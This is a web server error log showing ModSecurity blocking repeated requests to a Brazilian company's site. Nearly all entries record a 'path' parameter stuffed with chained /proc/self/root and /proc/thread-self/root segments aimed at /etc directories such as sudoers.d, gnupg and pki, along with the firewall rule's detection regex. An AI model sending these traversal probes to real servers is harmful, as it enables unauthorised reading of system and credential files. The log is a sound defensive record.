[Mon Mar 16 19:28:24.081283 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:57618] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiECFajLEzk2WiQ-104eQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:28:36.214616 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:57630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEFKQpVkWug9HeOt9ZAQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:28:38.710872 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:60140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEFrysWC90G-1nBrBrJQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:28:41.140153 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:54788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEGf9ocpUE4ed4uDwZBQAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:28:51.126966 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:58972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEI6TCbgAP5jq5TehQdwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:28:52.320084 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.241.46:54794] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEJEr9dMAiw-8KANNuZAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:29:13.917912 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:33098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEObysWC90G-1nBrBrPgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:29:31.428257 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:54034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiES46lpbStxTqkSkuOFAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:29:34.860346 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.241.46:38596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiETs_BxrYCr4hPDw8RgwAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:29:44.956694 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.241.46:38608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEWM_BxrYCr4hPDw8RkgAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:29:50.691561 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.241.46:38630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEXtSswJuvopo3lOiHGAAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:30:09.688689 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:56578] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEcbysWC90G-1nBrBrWgAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:30:10.958944 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:40018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEclajLEzk2WiQ-104twAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:30:11.609054 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.244.31:40500] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiEc7ysWC90G-1nBrBrWwAAAZc"]
[Mon Mar 16 19:30:16.027067 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:41438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEeP9ocpUE4ed4uDwZTAAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:30:18.152470 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:40026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEes_BxrYCr4hPDw8RnQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:30:40.270889 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:59576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEkFajLEzk2WiQ-1048QAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 19:30:45.501769 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:51214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiElEr9dMAiw-8KANNu2AAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:30:46.752460 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:59246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiElqTCbgAP5jq5TehQjgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:30:51.623079 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:57372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEm8_BxrYCr4hPDw8RpQAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:30:52.913606 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:57376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEnKQpVkWug9HeOt9ZHgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:30:54.212868 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:57378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEnrysWC90G-1nBrBrZgAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
